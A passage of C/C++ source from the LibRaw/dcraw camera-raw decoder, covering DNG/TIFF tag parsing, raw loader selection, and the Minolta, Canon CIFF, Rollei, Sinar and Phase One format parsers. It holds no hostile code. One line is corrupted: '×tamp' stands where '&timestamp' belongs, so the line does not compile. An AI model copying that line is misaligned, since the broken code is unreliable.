break;
}
}
}
}
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
}
}
break;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
case 50709:
stmread(imgdata.color.LocalizedCameraModel,len, ifp);
break;
#endif
case 61450:
cblack[4] = cblack[5] = MIN(sqrt((double)len),64);
case 50714: /* BlackLevel */
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 && tiff_ifd[ifd].samples == len) // LinearDNG, per-channel black
{
for(i=0; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_cblack[i]=
cblack[i]=
getreal(type)+0.5;
imgdata.color.dng_levels.dng_black= black = 0;
}
else
#endif
if((cblack[4] * cblack[5] < 2) && len == 1)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black=
#endif
black =
getreal(type);
}
else if(cblack[4] * cblack[5] <= len)
{
FORC (cblack[4] * cblack[5])
cblack[6+c] = getreal(type);
black = 0;
FORC4
cblack[c] = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(tag == 50714)
{
FORC (cblack[4] * cblack[5])
imgdata.color.dng_levels.dng_cblack[6+c]= cblack[6+c];
imgdata.color.dng_levels.dng_black=0;
FORC4
imgdata.color.dng_levels.dng_cblack[c]= 0;
}
#endif
}
break;
case 50715: /* BlackLevelDeltaH */
case 50716: /* BlackLevelDeltaV */
for (num=i=0; i < len && i < 65536; i++)
num += getreal(type);
black += num/len + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black += num/len + 0.5;
#endif
break;
case 50717: /* WhiteLevel */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_whitelevel[0]=
#endif
maximum = getint(type);
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 ) // Linear DNG case
for(i=1; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_whitelevel[i]=getint(type);
#endif
break;
case 50718: /* DefaultScale */
pixel_aspect = getreal(type);
pixel_aspect /= getreal(type);
if(pixel_aspect > 0.995 && pixel_aspect < 1.005)
pixel_aspect = 1.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50778:
imgdata.color.dng_color[0].illuminant = get2();
break;
case 50779:
imgdata.color.dng_color[1].illuminant = get2();
break;
#endif
case 50721: /* ColorMatrix1 */
case 50722: /* ColorMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 50721?0:1;
#endif
FORCC for (j=0; j < 3; j++)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].colormatrix[c][j]=
#endif
cm[c][j] = getreal(type);
}
use_cm = 1;
break;
case 0xc714: /* ForwardMatrix1 */
case 0xc715: /* ForwardMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 0xc714?0:1;
#endif
for (j=0; j < 3; j++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].forwardmatrix[j][c]=
#endif
fm[j][c] = getreal(type);
}
break;
case 50723: /* CameraCalibration1 */
case 50724: /* CameraCalibration2 */
#ifdef LIBRAW_LIBRARY_BUILD
j = tag == 50723?0:1;
#endif
for (i=0; i < colors; i++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[j].calibration[i][c]=
#endif
cc[i][c] = getreal(type);
}
break;
case 50727: /* AnalogBalance */
FORCC{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.analogbalance[c]=
#endif
ab[c] = getreal(type);
}
break;
case 50728: /* AsShotNeutral */
FORCC asn[c] = getreal(type);
break;
case 50729: /* AsShotWhiteXY */
xyz[0] = getreal(type);
xyz[1] = getreal(type);
xyz[2] = 1 - xyz[0] - xyz[1];
FORC3 xyz[c] /= d65_white[c];
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50730: /* DNG: Baseline Exposure */
baseline_exposure = getreal(type);
break;
#endif
// IB start
case 50740: /* tag 0xc634 : DNG Adobe, DNG Pentax, Sony SR2, DNG Private */
#ifdef LIBRAW_LIBRARY_BUILD
{
char mbuf[64];
unsigned short makernote_found = 0;
INT64 curr_pos, start_pos = ftell(ifp);
unsigned MakN_order, m_sorder = order;
unsigned MakN_length;
unsigned pos_in_original_raw;
fread(mbuf, 1, 6, ifp);
if (!strcmp(mbuf, "Adobe"))
{
order = 0x4d4d; // Adobe header is always in "MM" / big endian
curr_pos = start_pos + 6;
while (curr_pos + 8 - start_pos <= len)
{
fread(mbuf, 1, 4, ifp);
curr_pos += 8;
if (!strncmp(mbuf, "MakN", 4)) {
makernote_found = 1;
MakN_length = get4();
MakN_order = get2();
pos_in_original_raw = get4();
order = MakN_order;
parse_makernote_0xc634(curr_pos + 6 - pos_in_original_raw, 0, AdobeDNG);
break;
}
}
}
else
{
fread(mbuf + 6, 1, 2, ifp);
if (!strcmp(mbuf, "PENTAX ") ||
!strcmp(mbuf, "SAMSUNG"))
{
makernote_found = 1;
fseek(ifp, start_pos, SEEK_SET);
parse_makernote_0xc634(base, 0, CameraDNG);
}
}
fseek(ifp, start_pos, SEEK_SET);
order = m_sorder;
}
// IB end
#endif
if (dng_version) break;
parse_minolta (j = get4()+base);
fseek (ifp, j, SEEK_SET);
parse_tiff_ifd (base);
break;
case 50752:
read_shorts (cr2_slice, 3);
break;
case 50829: /* ActiveArea */
top_margin = getint(type);
left_margin = getint(type);
height = getint(type) - top_margin;
width = getint(type) - left_margin;
break;
case 50830: /* MaskedAreas */
for (i=0; i < len && i < 32; i++)
((int*)mask)[i] = getint(type);
black = 0;
break;
case 51009: /* OpcodeList2 */
meta_offset = ftell(ifp);
break;
case 64772: /* Kodak P-series */
if (len < 13) break;
fseek (ifp, 16, SEEK_CUR);
data_offset = get4();
fseek (ifp, 28, SEEK_CUR);
data_offset += get4();
load_raw = &CLASS packed_load_raw;
break;
case 65026:
if (type == 2) fgets (model2, 64, ifp);
}
fseek (ifp, save, SEEK_SET);
}
if (sony_length && sony_length < 10240000 && (buf = (unsigned *) malloc(sony_length))) {
fseek (ifp, sony_offset, SEEK_SET);
fread (buf, sony_length, 1, ifp);
sony_decrypt (buf, sony_length/4, 1, sony_key);
#ifndef LIBRAW_LIBRARY_BUILD
sfp = ifp;
if ((ifp = tmpfile())) {
fwrite (buf, sony_length, 1, ifp);
fseek (ifp, 0, SEEK_SET);
parse_tiff_ifd (-sony_offset);
fclose (ifp);
}
ifp = sfp;
#else
if( !ifp->tempbuffer_open(buf,sony_length))
{
parse_tiff_ifd(-sony_offset);
ifp->tempbuffer_close();
}
#endif
free (buf);
}
for (i=0; i < colors; i++)
FORCC cc[i][c] *= ab[i];
if (use_cm) {
FORCC for (i=0; i < 3; i++)
for (cam_xyz[c][i]=j=0; j < colors; j++)
cam_xyz[c][i] += cc[c][j] * cm[j][i] * xyz[i];
cam_xyz_coeff (cmatrix, cam_xyz);
}
if (asn[0]) {
cam_mul[3] = 0;
FORCC cam_mul[c] = 1 / asn[c];
}
if (!use_cm)
FORCC pre_mul[c] /= cc[c][c];
return 0;
}
int CLASS parse_tiff (int base)
{
int doff;
fseek (ifp, base, SEEK_SET);
order = get2();
if (order != 0x4949 && order != 0x4d4d) return 0;
get2();
while ((doff = get4())) {
fseek (ifp, doff+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
}
return 1;
}
void CLASS apply_tiff()
{
int max_samp=0, ties=0, os, ns, raw=-1, thm=-1, i;
struct jhead jh;
thumb_misc = 16;
if (thumb_offset) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
if((unsigned)jh.bits<17 && (unsigned)jh.wide < 0x10000 && (unsigned)jh.high < 0x10000)
{
thumb_misc = jh.bits;
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
}
for (i=tiff_nifds; i--; ) {
if (tiff_ifd[i].t_shutter)
shutter = tiff_ifd[i].t_shutter;
tiff_ifd[i].t_shutter = shutter;
}
for (i=0; i < tiff_nifds; i++) {
if (max_samp < tiff_ifd[i].samples)
max_samp = tiff_ifd[i].samples;
if (max_samp > 3) max_samp = 3;
os = raw_width*raw_height;
ns = tiff_ifd[i].t_width*tiff_ifd[i].t_height;
if (tiff_bps) {
os *= tiff_bps;
ns *= tiff_ifd[i].bps;
}
if ((tiff_ifd[i].comp != 6 || tiff_ifd[i].samples != 3) &&
unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
(unsigned)tiff_ifd[i].bps < 33 && (unsigned)tiff_ifd[i].samples < 13 &&
ns && ((ns > os && (ties = 1)) ||
(ns == os && shot_select == ties++))) {
raw_width = tiff_ifd[i].t_width;
raw_height = tiff_ifd[i].t_height;
tiff_bps = tiff_ifd[i].bps;
tiff_compress = tiff_ifd[i].comp;
data_offset = tiff_ifd[i].offset;
#ifdef LIBRAW_LIBRARY_BUILD
data_size = tiff_ifd[i].bytes;
#endif
tiff_flip = tiff_ifd[i].t_flip;
tiff_samples = tiff_ifd[i].samples;
tile_width = tiff_ifd[i].t_tile_width;
tile_length = tiff_ifd[i].t_tile_length;
shutter = tiff_ifd[i].t_shutter;
raw = i;
}
}
if (is_raw == 1 && ties) is_raw = ties;
if (!tile_width ) tile_width = INT_MAX;
if (!tile_length) tile_length = INT_MAX;
for (i=tiff_nifds; i--; )
if (tiff_ifd[i].t_flip) tiff_flip = tiff_ifd[i].t_flip;
if (raw >= 0 && !load_raw)
switch (tiff_compress) {
case 32767:
if (tiff_ifd[raw].bytes == raw_width*raw_height) {
tiff_bps = 12;
load_raw = &CLASS sony_arw2_load_raw; break;
}
if (!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw; break;
}
if (tiff_ifd[raw].bytes*8 != raw_width*raw_height*tiff_bps) {
raw_height += 8;
load_raw = &CLASS sony_arw_load_raw; break;
}
load_flags = 79;
case 32769:
load_flags++;
case 32770:
case 32773: goto slr;
case 0: case 1:
#ifdef LIBRAW_LIBRARY_BUILD
// Sony 14-bit uncompressed
if(!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2)
{
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
break;
}
if(!strncasecmp(make,"Nikon",5) && !strncmp(software,"Nikon Scan",10))
{
load_raw = &CLASS nikon_coolscan_load_raw;
raw_color = 1;
filters = 0;
break;
}
#endif
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*2 == raw_width*raw_height*3)
load_flags = 24;
if (tiff_ifd[raw].bytes*5 == raw_width*raw_height*8) {
load_flags = 81;
tiff_bps = 12;
} slr:
switch (tiff_bps) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 12: if (tiff_ifd[raw].phint == 2)
load_flags = 6;
load_raw = &CLASS packed_load_raw; break;
case 14: load_flags = 0;
case 16: load_raw = &CLASS unpacked_load_raw;
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*7 > raw_width*raw_height)
load_raw = &CLASS olympus_load_raw;
}
break;
case 6: case 7: case 99:
load_raw = &CLASS lossless_jpeg_load_raw; break;
case 262:
load_raw = &CLASS kodak_262_load_raw; break;
case 34713:
if ((raw_width+9)/10*16*raw_height == tiff_ifd[raw].bytes) {
load_raw = &CLASS packed_load_raw;
load_flags = 1;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes*2) {
load_raw = &CLASS packed_load_raw;
if (model[0] == 'N') load_flags = 80;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes) {
load_raw = &CLASS nikon_yuv_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
memset (cblack, 0, sizeof cblack);
filters = 0;
} else if (raw_width*raw_height*2 == tiff_ifd[raw].bytes) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
order = 0x4d4d;
} else
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width*raw_height*3 == tiff_ifd[raw].bytes*2)
{
load_raw = &CLASS packed_load_raw;
load_flags=80;
}
else if(tiff_ifd[raw].rows_per_strip && tiff_ifd[raw].strip_offsets_count &&
tiff_ifd[raw].strip_offsets_count == tiff_ifd[raw].strip_byte_counts_count)
{
int fit = 1;
for(int i = 0; i < tiff_ifd[raw].strip_byte_counts_count-1; i++) // all but last
if(tiff_ifd[raw].strip_byte_counts[i]*2 != tiff_ifd[raw].rows_per_strip*raw_width*3)
{
fit = 0;
break;
}
if(fit)
load_raw = &CLASS nikon_load_striped_packed_raw;
else
load_raw = &CLASS nikon_load_raw; // fallback
}
else
#endif
load_raw = &CLASS nikon_load_raw; break;
case 65535:
load_raw = &CLASS pentax_load_raw; break;
case 65000:
switch (tiff_ifd[raw].phint) {
case 2: load_raw = &CLASS kodak_rgb_load_raw; filters = 0; break;
case 6: load_raw = &CLASS kodak_ycbcr_load_raw; filters = 0; break;
case 32803: load_raw = &CLASS kodak_65000_load_raw;
}
case 32867: case 34892: break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: break;
#endif
default: is_raw = 0;
}
if (!dng_version)
if ( ((tiff_samples == 3 && tiff_ifd[raw].bytes && tiff_bps != 14 &&
(tiff_compress & -16) != 32768)
|| (tiff_bps == 8 && strncmp(make,"Phase",5) &&
!strcasestr(make,"Kodak") &&
!strstr(model2,"DEBUG RAW")))
&& strncmp(software,"Nikon Scan",10))
is_raw = 0;
for (i=0; i < tiff_nifds; i++)
if (i != raw
&& (tiff_ifd[i].samples == max_samp || (tiff_ifd[i].comp == 7 && tiff_ifd[i].samples == 1)) /* Allow 1-bps JPEGs */
&& tiff_ifd[i].bps>0 && tiff_ifd[i].bps < 33
&& tiff_ifd[i].phint != 32803
&& tiff_ifd[i].phint != 34892
&& unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
tiff_ifd[i].t_width * tiff_ifd[i].t_height / (SQR(tiff_ifd[i].bps)+1) >
thumb_width * thumb_height / (SQR(thumb_misc)+1)
&& tiff_ifd[i].comp != 34892) {
thumb_width = tiff_ifd[i].t_width;
thumb_height = tiff_ifd[i].t_height;
thumb_offset = tiff_ifd[i].offset;
thumb_length = tiff_ifd[i].bytes;
thumb_misc = tiff_ifd[i].bps;
thm = i;
}
if (thm >= 0) {
thumb_misc |= tiff_ifd[thm].samples << 5;
switch (tiff_ifd[thm].comp) {
case 0:
write_thumb = &CLASS layer_thumb;
break;
case 1:
if (tiff_ifd[thm].bps <= 8)
write_thumb = &CLASS ppm_thumb;
else if (!strncmp(make,"Imacon",6))
write_thumb = &CLASS ppm16_thumb;
else
thumb_load_raw = &CLASS kodak_thumb_load_raw;
break;
case 65000:
thumb_load_raw = tiff_ifd[thm].phint == 6 ?
&CLASS kodak_ycbcr_load_raw : &CLASS kodak_rgb_load_raw;
}
}
}
void CLASS parse_minolta (int base)
{
int save, tag, len, offset, high=0, wide=0, i, c;
short sorder=order;
fseek (ifp, base, SEEK_SET);
if (fgetc(ifp) || fgetc(ifp)-'M' || fgetc(ifp)-'R') return;
order = fgetc(ifp) * 0x101;
offset = base + get4() + 8;
#ifdef LIBRAW_LIBRARY_BUILD
if(offset>ifp->size()-8) // At least 8 bytes for tag/len
offset = ifp->size()-8;
#endif
while ((save=ftell(ifp)) < offset) {
for (tag=i=0; i < 4; i++)
tag = tag << 8 | fgetc(ifp);
len = get4();
if(len < 0)
return; // just ignore wrong len?? or raise bad file exception?
switch (tag) {
case 0x505244: /* PRD */
fseek (ifp, 8, SEEK_CUR);
high = get2();
wide = get2();
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x524946: /* RIF */
if (!strncasecmp(model,"DSLR-A100", 9))
{
fseek(ifp, 8, SEEK_CUR);
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][3] = 0x100;
}
break;
#endif
case 0x574247: /* WBG */
get4();
i = strcmp(model,"DiMAGE A200") ? 0:3;
FORC4 cam_mul[c ^ (c >> 1) ^ i] = get2();
break;
case 0x545457: /* TTW */
parse_tiff (ftell(ifp));
data_offset = offset;
}
fseek (ifp, save+len+8, SEEK_SET);
}
raw_height = high;
raw_width = wide;
order = sorder;
}
/*
Many cameras have a "debug mode" that writes JPEG and raw
at the same time. The raw file has no header, so try to
to open the matching JPEG file and read its metadata.
*/
void CLASS parse_external_jpeg()
{
const char *file, *ext;
char *jname, *jfile, *jext;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *save=ifp;
#else
#if defined(_WIN32) && !defined(__MINGW32__) && defined(_MSC_VER) && (_MSC_VER > 1310)
if(ifp->wfname())
{
std::wstring rawfile(ifp->wfname());
rawfile.replace(rawfile.length()-3,3,L"JPG");
if(!ifp->subfile_open(rawfile.c_str()))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
if(!ifp->fname())
{
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
ext = strrchr (ifname, '.');
file = strrchr (ifname, '/');
if (!file) file = strrchr (ifname, '\\');
#ifndef LIBRAW_LIBRARY_BUILD
if (!file) file = ifname-1;
#else
if (!file) file = (char*)ifname-1;
#endif
file++;
if (!ext || strlen(ext) != 4 || ext-file != 8) return;
jname = (char *) malloc (strlen(ifname) + 1);
merror (jname, "parse_external_jpeg()");
strcpy (jname, ifname);
jfile = file - ifname + jname;
jext = ext - ifname + jname;
if (strcasecmp (ext, ".jpg")) {
strcpy (jext, isupper(ext[1]) ? ".JPG":".jpg");
if (isdigit(*file)) {
memcpy (jfile, file+4, 4);
memcpy (jfile+4, file, 4);
}
} else
while (isdigit(*--jext)) {
if (*jext != '9') {
(*jext)++;
break;
}
*jext = '0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (strcmp (jname, ifname)) {
if ((ifp = fopen (jname, "rb"))) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Reading metadata from %s ...\n"), jname);
#endif
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
fclose (ifp);
}
}
#else
if (strcmp (jname, ifname))
{
if(!ifp->subfile_open(jname))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
}
#endif
if (!timestamp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("Failed to read metadata from %s\n"), jname);
#endif
}
free (jname);
#ifndef LIBRAW_LIBRARY_BUILD
ifp = save;
#endif
}
/*
CIFF block 0x1030 contains an 8x8 white sample.
Load this into white[][] for use in scale_colors().
*/
void CLASS ciff_block_1030()
{
static const ushort key[] = { 0x410, 0x45f3 };
int i, bpp, row, col, vbits=0;
unsigned long bitbuf=0;
if ((get2(),get4()) != 0x80008 || !get4()) return;
bpp = get2();
if (bpp != 10 && bpp != 12) return;
for (i=row=0; row < 8; row++)
for (col=0; col < 8; col++) {
if (vbits < bpp) {
bitbuf = bitbuf << 16 | (get2() ^ key[i++ & 1]);
vbits += 16;
}
white[row][col] = bitbuf >> (vbits -= bpp) & ~(-1 << bpp);
}
}
/*
Parse a CIFF file, better known as Canon CRW format.
*/
void CLASS parse_ciff (int offset, int length, int depth)
{
int tboff, nrecs, c, type, len, save, wbi=-1;
ushort key[] = { 0x410, 0x45f3 };
fseek (ifp, offset+length-4, SEEK_SET);
tboff = get4() + offset;
fseek (ifp, tboff, SEEK_SET);
nrecs = get2();
if ((nrecs | depth) > 127) return;
while (nrecs--) {
type = get2();
len = get4();
save = ftell(ifp) + 4;
fseek (ifp, offset+get4(), SEEK_SET);
if ((((type >> 8) + 8) | 8) == 0x38) {
parse_ciff (ftell(ifp), len, depth+1); /* Parse a sub-table */
}
#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x3004) parse_ciff (ftell(ifp), len, depth+1);
#endif
if (type == 0x0810)
fread (artist, 64, 1, ifp);
if (type == 0x080a) {
fread (make, 64, 1, ifp);
fseek (ifp, strbuflen(make) - 63, SEEK_CUR);
fread (model, 64, 1, ifp);
}
if (type == 0x1810) {
width = get4();
height = get4();
pixel_aspect = int_to_float(get4());
flip = get4();
}
if (type == 0x1835) /* Get the decoder table */
tiff_compress = get4();
if (type == 0x2007) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (type == 0x1818) {
shutter = libraw_powf64(2.0f, -int_to_float((get4(),get4())));
aperture = libraw_powf64(2.0f, int_to_float(get4())/2);
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurAp = aperture;
#endif
}
if (type == 0x102a) {
// iso_speed = pow (2.0, (get4(),get2())/32.0 - 4) * 50;
iso_speed = libraw_powf64(2.0f, ((get2(),get2()) + get2())/32.0f - 5.0f) * 100.0f;
#ifdef LIBRAW_LIBRARY_BUILD
aperture = _CanonConvertAperture((get2(),get2()));
imgdata.lens.makernotes.CurAp = aperture;
#else
aperture = libraw_powf64(2.0, (get2(),(short)get2())/64.0);
#endif
shutter = libraw_powf64(2.0,-((short)get2())/32.0);
wbi = (get2(),get2());
if (wbi > 17) wbi = 0;
fseek (ifp, 32, SEEK_CUR);
if (shutter > 1e6) shutter = get2()/10.0;
}
if (type == 0x102c) {
if (get2() > 512) { /* Pro90, G1 */
fseek (ifp, 118, SEEK_CUR);
FORC4 cam_mul[c ^ 2] = get2();
} else { /* G2, S30, S40 */
fseek (ifp, 98, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2();
}
}
#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x10a9)
{
INT64 o = ftell(ifp);
fseek (ifp, (0x5<<1), SEEK_CUR);
Canon_WBpresets(0,0);
fseek(ifp,o,SEEK_SET);
}
if (type == 0x102d)
{
INT64 o = ftell(ifp);
Canon_CameraSettings();
fseek(ifp,o,SEEK_SET);
}
if (type == 0x580b)
{
if (strcmp(model,"Canon EOS D30")) sprintf(imgdata.shootinginfo.BodySerial, "%d", len);
else sprintf(imgdata.shootinginfo.BodySerial, "%0x-%05d", len>>16, len&0xffff);
}
#endif
if (type == 0x0032) {
if (len == 768) { /* EOS D30 */
fseek (ifp, 72, SEEK_CUR);
FORC4
{
ushort q = get2();
cam_mul[c ^ (c >> 1)] = q? 1024.0 / get2() : 1024;
}
if (!wbi) cam_mul[0] = -1; /* use my auto white balance */
} else if (!cam_mul[0]) {
if (get2() == key[0]) /* Pro1, G6, S60, S70 */
c = (strstr(model,"Pro1") ?
"012346000000000000":"01345:000000006008")[LIM(0,wbi,17)]-'0'+ 2;
else { /* G3, G5, S45, S50 */
c = "023457000000006000"[LIM(0,wbi,17)]-'0';
key[0] = key[1] = 0;
}
fseek (ifp, 78 + c*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2() ^ key[c & 1];
if (!wbi) cam_mul[0] = -1;
}
}
if (type == 0x10a9) { /* D60, 10D, 300D, and clones */
if (len > 66) wbi = "0134567028"[LIM(0,wbi,9)]-'0';
fseek (ifp, 2 + wbi*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
}
if (type == 0x1030 && wbi>=0 && (0x18040 >> wbi & 1))
ciff_block_1030(); /* all that don't have 0x10a9 */
if (type == 0x1031) {
raw_width = (get2(),get2());
raw_height = get2();
}
if (type == 0x501c) {
iso_speed = len & 0xffff;
}
if (type == 0x5029) {
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurFocal = len >> 16;
imgdata.lens.makernotes.FocalType = len & 0xffff;
if (imgdata.lens.makernotes.FocalType == 2) {
imgdata.lens.makernotes.CanonFocalUnits = 32;
if(imgdata.lens.makernotes.CanonFocalUnits>1)
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
focal_len = imgdata.lens.makernotes.CurFocal;
#else
focal_len = len >> 16;
if ((len & 0xffff) == 2) focal_len /= 32;
#endif
}
if (type == 0x5813) flash_used = int_to_float(len);
if (type == 0x5814) canon_ev = int_to_float(len);
if (type == 0x5817) shot_order = len;
if (type == 0x5834)
{
unique_id = len;
#ifdef LIBRAW_LIBRARY_BUILD
setCanonBodyFeatures(unique_id);
#endif
}
if (type == 0x580e) timestamp = len;
if (type == 0x180e) timestamp = get4();
#ifdef LOCALTIME
if ((type | 0x4000) == 0x580e)
timestamp = mktime (gmtime (×tamp));
#endif
fseek (ifp, save, SEEK_SET);
}
}
void CLASS parse_rollei()
{
char line[128], *val;
struct tm t;
fseek (ifp, 0, SEEK_SET);
memset (&t, 0, sizeof t);
do {
fgets (line, 128, ifp);
if ((val = strchr(line,'=')))
*val++ = 0;
else
val = line + strbuflen(line);
if (!strcmp(line,"DAT"))
sscanf (val, "%d.%d.%d", &t.tm_mday, &t.tm_mon, &t.tm_year);
if (!strcmp(line,"TIM"))
sscanf (val, "%d:%d:%d", &t.tm_hour, &t.tm_min, &t.tm_sec);
if (!strcmp(line,"HDR"))
thumb_offset = atoi(val);
if (!strcmp(line,"X "))
raw_width = atoi(val);
if (!strcmp(line,"Y "))
raw_height = atoi(val);
if (!strcmp(line,"TX "))
thumb_width = atoi(val);
if (!strcmp(line,"TY "))
thumb_height = atoi(val);
} while (strncmp(line,"EOHD",4));
data_offset = thumb_offset + thumb_width * thumb_height * 2;
t.tm_year -= 1900;
t.tm_mon -= 1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
strcpy (make, "Rollei");
strcpy (model,"d530flex");
write_thumb = &CLASS rollei_thumb;
}
void CLASS parse_sinar_ia()
{
int entries, off;
char str[8], *cp;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
entries = get4();
fseek (ifp, get4(), SEEK_SET);
while (entries--) {
off = get4(); get4();
fread (str, 8, 1, ifp);
if (!strcmp(str,"META")) meta_offset = off;
if (!strcmp(str,"THUMB")) thumb_offset = off;
if (!strcmp(str,"RAW0")) data_offset = off;
}
fseek (ifp, meta_offset+20, SEEK_SET);
fread (make, 64, 1, ifp);
make[63] = 0;
if ((cp = strchr(make,' '))) {
strcpy (model, cp+1);
*cp = 0;
}
raw_width = get2();
raw_height = get2();
load_raw = &CLASS unpacked_load_raw;
thumb_width = (get4(),get2());
thumb_height = get2();
write_thumb = &CLASS ppm_thumb;
maximum = 0x3fff;
}
void CLASS parse_phase_one (int base)
{
unsigned entries, tag, type, len, data, save, i, c;
float romm_cam[3][3];
char *cp;
memset (&ph1, 0, sizeof ph1);
fseek (ifp, base, SEEK_SET);
order = get4() & 0xffff;
if (get4() >> 8 != 0x526177) return; /* "Raw" */
fseek (ifp, get4()+base, SEEK_SET);
entries = get4();
get4();
while (entries--) {
